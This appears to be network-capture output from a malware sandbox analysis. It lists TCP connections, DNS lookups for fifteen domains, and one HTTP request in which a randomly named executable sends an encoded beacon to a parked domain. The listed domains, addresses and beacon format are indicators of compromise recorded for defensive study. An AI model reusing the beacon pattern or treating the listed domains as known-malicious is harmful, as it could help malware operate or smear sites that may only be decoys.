                                          May 27, 2024 12:45:05.627834082 CEST4975080192.168.2.5199.59.243.225
                                          May 27, 2024 12:45:05.627937078 CEST4975080192.168.2.5199.59.243.225
                                          May 27, 2024 12:45:06.630820990 CEST4975080192.168.2.5199.59.243.225
                                          May 27, 2024 12:45:07.653848886 CEST4975180192.168.2.5199.59.243.225
                                          May 27, 2024 12:45:07.658869982 CEST8049751199.59.243.225192.168.2.5
                                          May 27, 2024 12:45:07.661942005 CEST4975180192.168.2.5199.59.243.225
                                          May 27, 2024 12:45:07.664710999 CEST4975180192.168.2.5199.59.243.225
                                          May 27, 2024 12:45:07.670456886 CEST8049751199.59.243.225192.168.2.5
                                          May 27, 2024 12:45:08.132663012 CEST8049751199.59.243.225192.168.2.5
                                          May 27, 2024 12:45:08.132683039 CEST8049751199.59.243.225192.168.2.5
                                          May 27, 2024 12:45:08.132735014 CEST8049751199.59.243.225192.168.2.5
                                          May 27, 2024 12:45:08.132992029 CEST4975180192.168.2.5199.59.243.225
                                          May 27, 2024 12:45:08.132992029 CEST4975180192.168.2.5199.59.243.225
                                          May 27, 2024 12:45:08.136044025 CEST4975180192.168.2.5199.59.243.225
                                          May 27, 2024 12:45:08.140995026 CEST8049751199.59.243.225192.168.2.5
                                          May 27, 2024 12:45:13.269985914 CEST4975280192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:13.274966002 CEST8049752173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:13.275121927 CEST4975280192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:13.277862072 CEST4975280192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:13.282744884 CEST8049752173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:13.943128109 CEST8049752173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:13.943249941 CEST8049752173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:13.943393946 CEST4975280192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:14.787070990 CEST4975280192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:15.805562973 CEST4975380192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:15.810630083 CEST8049753173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:15.810758114 CEST4975380192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:15.812705040 CEST4975380192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:15.820086956 CEST8049753173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:16.509840965 CEST8049753173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:16.509999990 CEST8049753173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:16.510049105 CEST4975380192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:17.395960093 CEST4975380192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:18.960252047 CEST4975480192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:18.965611935 CEST8049754173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:18.965706110 CEST4975480192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:18.968502045 CEST4975480192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:18.974153042 CEST8049754173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:18.974292994 CEST8049754173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:19.702219009 CEST8049754173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:19.702758074 CEST8049754173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:19.702841997 CEST4975480192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:20.475991964 CEST4975480192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:21.497682095 CEST4975580192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:21.502696037 CEST8049755173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:21.502795935 CEST4975580192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:21.505393982 CEST4975580192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:21.510354996 CEST8049755173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:22.210407019 CEST8049755173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:22.215008974 CEST8049755173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:22.217986107 CEST4975580192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:22.220412016 CEST4975580192.168.2.5173.254.28.213
                                          May 27, 2024 12:45:22.225297928 CEST8049755173.254.28.213192.168.2.5
                                          May 27, 2024 12:45:27.933923006 CEST4975680192.168.2.565.181.132.158
                                          May 27, 2024 12:45:27.939224005 CEST804975665.181.132.158192.168.2.5
                                          May 27, 2024 12:45:27.939369917 CEST4975680192.168.2.565.181.132.158
                                          May 27, 2024 12:45:27.941920996 CEST4975680192.168.2.565.181.132.158
                                          May 27, 2024 12:45:27.947210073 CEST804975665.181.132.158192.168.2.5
                                          May 27, 2024 12:45:28.924792051 CEST804975665.181.132.158192.168.2.5
                                          May 27, 2024 12:45:28.925163984 CEST804975665.181.132.158192.168.2.5
                                          May 27, 2024 12:45:28.925275087 CEST4975680192.168.2.565.181.132.158
                                          May 27, 2024 12:45:29.443389893 CEST4975680192.168.2.565.181.132.158
                                          May 27, 2024 12:45:30.467521906 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:30.472554922 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:30.474102974 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:30.478554964 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:30.483516932 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:31.993946075 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:32.142249107 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:32.142309904 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:32.142340899 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:32.142525911 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:32.142571926 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:32.142601967 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:32.142601967 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:32.142704964 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:32.143455029 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:32.144737005 CEST804975765.181.132.158192.168.2.5
                                          May 27, 2024 12:45:32.144821882 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:32.144821882 CEST4975780192.168.2.565.181.132.158
                                          May 27, 2024 12:45:33.008932114 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:33.014163971 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:33.014504910 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:33.016129971 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:33.021418095 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:33.021447897 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:34.526505947 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:34.834199905 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:35.064579010 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:35.064625025 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:35.064654112 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:35.064661026 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:35.064690113 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:35.064750910 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:35.064851046 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:35.064851046 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:35.068124056 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:35.068156958 CEST804975865.181.132.158192.168.2.5
                                          May 27, 2024 12:45:35.068209887 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:35.068331957 CEST4975880192.168.2.565.181.132.158
                                          May 27, 2024 12:45:36.185566902 CEST4975980192.168.2.565.181.132.158
                                          May 27, 2024 12:45:36.191262007 CEST804975965.181.132.158192.168.2.5
                                          May 27, 2024 12:45:36.191476107 CEST4975980192.168.2.565.181.132.158
                                          May 27, 2024 12:45:36.194500923 CEST4975980192.168.2.565.181.132.158
                                          May 27, 2024 12:45:36.200295925 CEST804975965.181.132.158192.168.2.5
                                          May 27, 2024 12:45:37.161252975 CEST804975965.181.132.158192.168.2.5
                                          May 27, 2024 12:45:37.161287069 CEST804975965.181.132.158192.168.2.5
                                          May 27, 2024 12:45:37.161448002 CEST4975980192.168.2.565.181.132.158
                                          May 27, 2024 12:45:37.164016008 CEST4975980192.168.2.565.181.132.158
                                          May 27, 2024 12:45:37.174266100 CEST804975965.181.132.158192.168.2.5
                                          May 27, 2024 12:45:42.222515106 CEST4976080192.168.2.53.33.130.190
                                          May 27, 2024 12:45:42.227864027 CEST80497603.33.130.190192.168.2.5
                                          May 27, 2024 12:45:42.227948904 CEST4976080192.168.2.53.33.130.190
                                          May 27, 2024 12:45:42.231117964 CEST4976080192.168.2.53.33.130.190
                                          May 27, 2024 12:45:42.236053944 CEST80497603.33.130.190192.168.2.5
                                          May 27, 2024 12:45:42.705410957 CEST80497603.33.130.190192.168.2.5
                                          May 27, 2024 12:45:42.705490112 CEST4976080192.168.2.53.33.130.190
                                          May 27, 2024 12:45:43.741987944 CEST4976080192.168.2.53.33.130.190
                                          May 27, 2024 12:45:43.749083996 CEST80497603.33.130.190192.168.2.5
                                          May 27, 2024 12:45:44.760143995 CEST4976180192.168.2.53.33.130.190
                                          May 27, 2024 12:45:44.897576094 CEST80497613.33.130.190192.168.2.5
                                          May 27, 2024 12:45:44.898132086 CEST4976180192.168.2.53.33.130.190
                                          May 27, 2024 12:45:44.901004076 CEST4976180192.168.2.53.33.130.190
                                          May 27, 2024 12:45:44.906128883 CEST80497613.33.130.190192.168.2.5
                                          May 27, 2024 12:45:45.390659094 CEST80497613.33.130.190192.168.2.5
                                          May 27, 2024 12:45:45.393263102 CEST4976180192.168.2.53.33.130.190
                                          May 27, 2024 12:45:46.412199974 CEST4976180192.168.2.53.33.130.190
                                          May 27, 2024 12:45:46.417484999 CEST80497613.33.130.190192.168.2.5
                                          May 27, 2024 12:45:47.430751085 CEST4976280192.168.2.53.33.130.190
                                          May 27, 2024 12:45:47.435952902 CEST80497623.33.130.190192.168.2.5
                                          May 27, 2024 12:45:47.436101913 CEST4976280192.168.2.53.33.130.190
                                          May 27, 2024 12:45:47.438002110 CEST4976280192.168.2.53.33.130.190
                                          May 27, 2024 12:45:47.442970037 CEST80497623.33.130.190192.168.2.5
                                          May 27, 2024 12:45:47.443284988 CEST80497623.33.130.190192.168.2.5
                                          May 27, 2024 12:45:48.820445061 CEST80497623.33.130.190192.168.2.5
                                          May 27, 2024 12:45:48.820522070 CEST4976280192.168.2.53.33.130.190
                                          May 27, 2024 12:45:48.946007013 CEST4976280192.168.2.53.33.130.190
                                          May 27, 2024 12:45:48.951170921 CEST80497623.33.130.190192.168.2.5
                                          May 27, 2024 12:45:49.962188959 CEST4976380192.168.2.53.33.130.190
                                          May 27, 2024 12:45:49.967194080 CEST80497633.33.130.190192.168.2.5
                                          May 27, 2024 12:45:49.967268944 CEST4976380192.168.2.53.33.130.190
                                          May 27, 2024 12:45:49.969013929 CEST4976380192.168.2.53.33.130.190
                                          May 27, 2024 12:45:49.974174976 CEST80497633.33.130.190192.168.2.5
                                          May 27, 2024 12:45:50.435273886 CEST80497633.33.130.190192.168.2.5
                                          May 27, 2024 12:45:50.435583115 CEST80497633.33.130.190192.168.2.5
                                          May 27, 2024 12:45:50.435642958 CEST4976380192.168.2.53.33.130.190
                                          May 27, 2024 12:45:50.439548969 CEST4976380192.168.2.53.33.130.190
                                          May 27, 2024 12:45:50.445059061 CEST80497633.33.130.190192.168.2.5
                                          May 27, 2024 12:45:55.633162975 CEST4976480192.168.2.551.195.44.77
                                          May 27, 2024 12:45:55.638134003 CEST804976451.195.44.77192.168.2.5
                                          May 27, 2024 12:45:55.638303041 CEST4976480192.168.2.551.195.44.77
                                          May 27, 2024 12:45:55.639969110 CEST4976480192.168.2.551.195.44.77
                                          May 27, 2024 12:45:55.644893885 CEST804976451.195.44.77192.168.2.5
                                          May 27, 2024 12:45:56.274019957 CEST804976451.195.44.77192.168.2.5
                                          May 27, 2024 12:45:56.274203062 CEST804976451.195.44.77192.168.2.5
                                          May 27, 2024 12:45:56.274267912 CEST4976480192.168.2.551.195.44.77
                                          May 27, 2024 12:45:57.146553040 CEST4976480192.168.2.551.195.44.77
                                          May 27, 2024 12:45:58.165324926 CEST4976580192.168.2.551.195.44.77
                                          May 27, 2024 12:45:58.170592070 CEST804976551.195.44.77192.168.2.5
                                          May 27, 2024 12:45:58.170703888 CEST4976580192.168.2.551.195.44.77
                                          May 27, 2024 12:45:58.172692060 CEST4976580192.168.2.551.195.44.77
                                          May 27, 2024 12:45:58.177788973 CEST804976551.195.44.77192.168.2.5
                                          May 27, 2024 12:45:58.789990902 CEST804976551.195.44.77192.168.2.5
                                          May 27, 2024 12:45:58.790128946 CEST804976551.195.44.77192.168.2.5
                                          May 27, 2024 12:45:58.790194988 CEST4976580192.168.2.551.195.44.77
                                          May 27, 2024 12:45:59.682053089 CEST4976580192.168.2.551.195.44.77
                                          May 27, 2024 12:46:00.700767040 CEST4976680192.168.2.551.195.44.77
                                          May 27, 2024 12:46:00.705725908 CEST804976651.195.44.77192.168.2.5
                                          May 27, 2024 12:46:00.705795050 CEST4976680192.168.2.551.195.44.77
                                          May 27, 2024 12:46:00.708856106 CEST4976680192.168.2.551.195.44.77
                                          May 27, 2024 12:46:00.714549065 CEST804976651.195.44.77192.168.2.5
                                          May 27, 2024 12:46:00.714675903 CEST804976651.195.44.77192.168.2.5
                                          May 27, 2024 12:46:01.379152060 CEST804976651.195.44.77192.168.2.5
                                          May 27, 2024 12:46:01.379199028 CEST804976651.195.44.77192.168.2.5
                                          May 27, 2024 12:46:01.379281998 CEST4976680192.168.2.551.195.44.77
                                          May 27, 2024 12:46:02.225022078 CEST4976680192.168.2.551.195.44.77
                                          May 27, 2024 12:46:03.246159077 CEST4976780192.168.2.551.195.44.77
                                          May 27, 2024 12:46:03.251466990 CEST804976751.195.44.77192.168.2.5
                                          May 27, 2024 12:46:03.254229069 CEST4976780192.168.2.551.195.44.77
                                          May 27, 2024 12:46:03.256364107 CEST4976780192.168.2.551.195.44.77
                                          May 27, 2024 12:46:03.261559010 CEST804976751.195.44.77192.168.2.5
                                          May 27, 2024 12:46:03.895646095 CEST804976751.195.44.77192.168.2.5
                                          May 27, 2024 12:46:03.895680904 CEST804976751.195.44.77192.168.2.5
                                          May 27, 2024 12:46:03.895998001 CEST4976780192.168.2.551.195.44.77
                                          May 27, 2024 12:46:03.898684978 CEST4976780192.168.2.551.195.44.77
                                          May 27, 2024 12:46:03.904243946 CEST804976751.195.44.77192.168.2.5
                                          May 27, 2024 12:46:09.053658962 CEST4976880192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:09.058723927 CEST8049768217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:09.058800936 CEST4976880192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:09.061804056 CEST4976880192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:09.066756010 CEST8049768217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:09.692454100 CEST8049768217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:09.692605972 CEST8049768217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:09.692653894 CEST4976880192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:10.570075989 CEST4976880192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:11.588458061 CEST4976980192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:11.593643904 CEST8049769217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:11.593734026 CEST4976980192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:11.596506119 CEST4976980192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:11.601548910 CEST8049769217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:12.196279049 CEST8049769217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:12.196346045 CEST8049769217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:12.196646929 CEST4976980192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:13.099742889 CEST4976980192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:14.555500984 CEST4977080192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:14.561108112 CEST8049770217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:14.561254025 CEST4977080192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:14.564163923 CEST4977080192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:14.579708099 CEST8049770217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:14.579907894 CEST8049770217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:15.179610014 CEST8049770217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:15.179706097 CEST8049770217.70.184.50192.168.2.5
                                          May 27, 2024 12:46:15.179970980 CEST4977080192.168.2.5217.70.184.50
                                          May 27, 2024 12:46:16.068538904 CEST4977080192.168.2.5217.70.184.50

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          May 27, 2024 12:42:49.798155069 CEST5815553192.168.2.51.1.1.1
                                          May 27, 2024 12:42:49.924351931 CEST53581551.1.1.1192.168.2.5
                                          May 27, 2024 12:43:05.462030888 CEST5966053192.168.2.51.1.1.1
                                          May 27, 2024 12:43:06.337263107 CEST53596601.1.1.1192.168.2.5
                                          May 27, 2024 12:43:21.164896011 CEST5135953192.168.2.51.1.1.1
                                          May 27, 2024 12:43:21.446595907 CEST53513591.1.1.1192.168.2.5
                                          May 27, 2024 12:43:34.544884920 CEST6470253192.168.2.51.1.1.1
                                          May 27, 2024 12:43:34.690310001 CEST53647021.1.1.1192.168.2.5
                                          May 27, 2024 12:43:48.525695086 CEST5583753192.168.2.51.1.1.1
                                          May 27, 2024 12:43:49.052735090 CEST53558371.1.1.1192.168.2.5
                                          May 27, 2024 12:44:02.979590893 CEST6141553192.168.2.51.1.1.1
                                          May 27, 2024 12:44:03.006393909 CEST53614151.1.1.1192.168.2.5
                                          May 27, 2024 12:44:17.087901115 CEST4974453192.168.2.51.1.1.1
                                          May 27, 2024 12:44:17.095985889 CEST53497441.1.1.1192.168.2.5
                                          May 27, 2024 12:44:31.369381905 CEST5840153192.168.2.51.1.1.1
                                          May 27, 2024 12:44:32.217118025 CEST53584011.1.1.1192.168.2.5
                                          May 27, 2024 12:44:45.649806976 CEST6476253192.168.2.51.1.1.1
                                          May 27, 2024 12:44:45.755271912 CEST53647621.1.1.1192.168.2.5
                                          May 27, 2024 12:44:58.963849068 CEST6520853192.168.2.51.1.1.1
                                          May 27, 2024 12:44:59.158282042 CEST53652081.1.1.1192.168.2.5
                                          May 27, 2024 12:45:13.149878025 CEST5271553192.168.2.51.1.1.1
                                          May 27, 2024 12:45:13.266072989 CEST53527151.1.1.1192.168.2.5
                                          May 27, 2024 12:45:27.228873014 CEST6229453192.168.2.51.1.1.1
                                          May 27, 2024 12:45:27.930335045 CEST53622941.1.1.1192.168.2.5
                                          May 27, 2024 12:45:42.181823969 CEST4925153192.168.2.51.1.1.1
                                          May 27, 2024 12:45:42.219029903 CEST53492511.1.1.1192.168.2.5
                                          May 27, 2024 12:45:55.446687937 CEST5828853192.168.2.51.1.1.1
                                          May 27, 2024 12:45:55.630562067 CEST53582881.1.1.1192.168.2.5
                                          May 27, 2024 12:46:08.985019922 CEST6172853192.168.2.51.1.1.1
                                          May 27, 2024 12:46:09.049962997 CEST53617281.1.1.1192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          May 27, 2024 12:42:49.798155069 CEST192.168.2.51.1.1.10x36ceStandard query (0)www.double.gayA (IP address)IN (0x0001)false
                                          May 27, 2024 12:43:05.462030888 CEST192.168.2.51.1.1.10xbf57Standard query (0)www.duhocvietanh.edu.vnA (IP address)IN (0x0001)false
                                          May 27, 2024 12:43:21.164896011 CEST192.168.2.51.1.1.10x8af5Standard query (0)www.botcsllc.comA (IP address)IN (0x0001)false
                                          May 27, 2024 12:43:34.544884920 CEST192.168.2.51.1.1.10x24e5Standard query (0)www.pilatovparts.ruA (IP address)IN (0x0001)false
                                          May 27, 2024 12:43:48.525695086 CEST192.168.2.51.1.1.10x206aStandard query (0)www.cica-rank.comA (IP address)IN (0x0001)false
                                          May 27, 2024 12:44:02.979590893 CEST192.168.2.51.1.1.10xec80Standard query (0)www.diplocity.orgA (IP address)IN (0x0001)false
                                          May 27, 2024 12:44:17.087901115 CEST192.168.2.51.1.1.10xae54Standard query (0)www.falldove.topA (IP address)IN (0x0001)false
                                          May 27, 2024 12:44:31.369381905 CEST192.168.2.51.1.1.10x4425Standard query (0)www.lesfleursdeceline.beA (IP address)IN (0x0001)false
                                          May 27, 2024 12:44:45.649806976 CEST192.168.2.51.1.1.10x849Standard query (0)www.btx937.topA (IP address)IN (0x0001)false
                                          May 27, 2024 12:44:58.963849068 CEST192.168.2.51.1.1.10x39a3Standard query (0)www.equi-sen.caA (IP address)IN (0x0001)false
                                          May 27, 2024 12:45:13.149878025 CEST192.168.2.51.1.1.10x1343Standard query (0)www.newmediamonday.comA (IP address)IN (0x0001)false
                                          May 27, 2024 12:45:27.228873014 CEST192.168.2.51.1.1.10x15eeStandard query (0)www.jl884.vipA (IP address)IN (0x0001)false
                                          May 27, 2024 12:45:42.181823969 CEST192.168.2.51.1.1.10x5f49Standard query (0)www.retrorocketmodels.comA (IP address)IN (0x0001)false
                                          May 27, 2024 12:45:55.446687937 CEST192.168.2.51.1.1.10x672bStandard query (0)www.adylkerak.ruA (IP address)IN (0x0001)false
                                          May 27, 2024 12:46:08.985019922 CEST192.168.2.51.1.1.10x9895Standard query (0)www.tranivel.comA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          May 27, 2024 12:42:49.924351931 CEST1.1.1.1192.168.2.50x36ceNo error (0)www.double.gay94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                          May 27, 2024 12:42:49.924351931 CEST1.1.1.1192.168.2.50x36ceNo error (0)94950.bodis.com199.59.243.225A (IP address)IN (0x0001)false
                                          May 27, 2024 12:43:06.337263107 CEST1.1.1.1192.168.2.50xbf57No error (0)www.duhocvietanh.edu.vnduhocvietanh.edu.vnCNAME (Canonical name)IN (0x0001)false
                                          May 27, 2024 12:43:06.337263107 CEST1.1.1.1192.168.2.50xbf57No error (0)duhocvietanh.edu.vn103.138.88.50A (IP address)IN (0x0001)false
                                          May 27, 2024 12:43:21.446595907 CEST1.1.1.1192.168.2.50x8af5No error (0)www.botcsllc.com216.40.34.41A (IP address)IN (0x0001)false
                                          May 27, 2024 12:43:34.690310001 CEST1.1.1.1192.168.2.50x24e5No error (0)www.pilatovparts.ru31.31.196.16A (IP address)IN (0x0001)false
                                          May 27, 2024 12:43:49.052735090 CEST1.1.1.1192.168.2.50x206aNo error (0)www.cica-rank.com183.181.79.111A (IP address)IN (0x0001)false
                                          May 27, 2024 12:44:03.006393909 CEST1.1.1.1192.168.2.50xec80No error (0)www.diplocity.org78.142.211.199A (IP address)IN (0x0001)false
                                          May 27, 2024 12:44:17.095985889 CEST1.1.1.1192.168.2.50xae54No error (0)www.falldove.top66.29.149.46A (IP address)IN (0x0001)false
                                          May 27, 2024 12:44:32.217118025 CEST1.1.1.1192.168.2.50x4425No error (0)www.lesfleursdeceline.be606a02a99ef940518cd4e7e5bdeafa8c.webbuilder-online.netCNAME (Canonical name)IN (0x0001)false
                                          May 27, 2024 12:44:32.217118025 CEST1.1.1.1192.168.2.50x4425No error (0)606a02a99ef940518cd4e7e5bdeafa8c.webbuilder-online.netlb.webnode.ioCNAME (Canonical name)IN (0x0001)false
                                          May 27, 2024 12:44:32.217118025 CEST1.1.1.1192.168.2.50x4425No error (0)lb.webnode.io3.125.172.46A (IP address)IN (0x0001)false
                                          May 27, 2024 12:44:32.217118025 CEST1.1.1.1192.168.2.50x4425No error (0)lb.webnode.io3.73.27.108A (IP address)IN (0x0001)false
                                          May 27, 2024 12:44:45.755271912 CEST1.1.1.1192.168.2.50x849No error (0)www.btx937.top94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                          May 27, 2024 12:44:45.755271912 CEST1.1.1.1192.168.2.50x849No error (0)94950.bodis.com199.59.243.225A (IP address)IN (0x0001)false
                                          May 27, 2024 12:44:59.158282042 CEST1.1.1.1192.168.2.50x39a3No error (0)www.equi-sen.ca199.59.243.225A (IP address)IN (0x0001)false
                                          May 27, 2024 12:45:13.266072989 CEST1.1.1.1192.168.2.50x1343No error (0)www.newmediamonday.comnewmediamonday.comCNAME (Canonical name)IN (0x0001)false
                                          May 27, 2024 12:45:13.266072989 CEST1.1.1.1192.168.2.50x1343No error (0)newmediamonday.com173.254.28.213A (IP address)IN (0x0001)false
                                          May 27, 2024 12:45:27.930335045 CEST1.1.1.1192.168.2.50x15eeNo error (0)www.jl884.vipe6375a47.jl884.vip.cname.scname.comCNAME (Canonical name)IN (0x0001)false
                                          May 27, 2024 12:45:27.930335045 CEST1.1.1.1192.168.2.50x15eeNo error (0)e6375a47.jl884.vip.cname.scname.com65.181.132.158A (IP address)IN (0x0001)false
                                          May 27, 2024 12:45:27.930335045 CEST1.1.1.1192.168.2.50x15eeNo error (0)e6375a47.jl884.vip.cname.scname.com38.47.158.160A (IP address)IN (0x0001)false
                                          May 27, 2024 12:45:42.219029903 CEST1.1.1.1192.168.2.50x5f49No error (0)www.retrorocketmodels.comretrorocketmodels.comCNAME (Canonical name)IN (0x0001)false
                                          May 27, 2024 12:45:42.219029903 CEST1.1.1.1192.168.2.50x5f49No error (0)retrorocketmodels.com3.33.130.190A (IP address)IN (0x0001)false
                                          May 27, 2024 12:45:42.219029903 CEST1.1.1.1192.168.2.50x5f49No error (0)retrorocketmodels.com15.197.148.33A (IP address)IN (0x0001)false
                                          May 27, 2024 12:45:55.630562067 CEST1.1.1.1192.168.2.50x672bNo error (0)www.adylkerak.ru51.195.44.77A (IP address)IN (0x0001)false
                                          May 27, 2024 12:46:09.049962997 CEST1.1.1.1192.168.2.50x9895No error (0)www.tranivel.comwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                          May 27, 2024 12:46:09.049962997 CEST1.1.1.1192.168.2.50x9895No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • www.double.gay
                                          • www.duhocvietanh.edu.vn
                                          • www.botcsllc.com
                                          • www.pilatovparts.ru
                                          • www.cica-rank.com
                                          • www.diplocity.org
                                          • www.falldove.top
                                          • www.lesfleursdeceline.be
                                          • www.btx937.top
                                          • www.equi-sen.ca
                                          • www.newmediamonday.com
                                          • www.jl884.vip
                                          • www.retrorocketmodels.com
                                          • www.adylkerak.ru
                                          • www.tranivel.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.549714199.59.243.225806408C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          TimestampBytes transferredDirectionData
                                          May 27, 2024 12:42:49.943654060 CEST501OUTGET /gasu/?4b34ht=gR1i3bbXa1XbyGNM6Bi8srl2p7nPwmhk9UC1j0Li0VIEHsGUlRc+GvhwvE9+CLKXaHrFrMfO+pZgQjhrKjiTkfzvVWHOu9j6JtqDJOExpSNaoLQHX52jb9GcMlo+0mR5zw==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.double.gay
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:42:50.409034967 CEST1236INHTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:42:49 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1494
                                          x-request-id: e2009326-b285-4c4d-a45d-b3e33f260433
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wbcXhy5697iqBuGaRqQFffqjQ6QBgoVryZy3irt5MM/IryA/C/Q4vJBgscXL7HRa+/gwW1/Wbn2KJklSfvAZ7A==
                                          set-cookie: parking_session=e2009326-b285-4c4d-a45d-b3e33f260433; expires=Mon, 27 May 2024 10:57:50 GMT; path=/
                                          connection: close
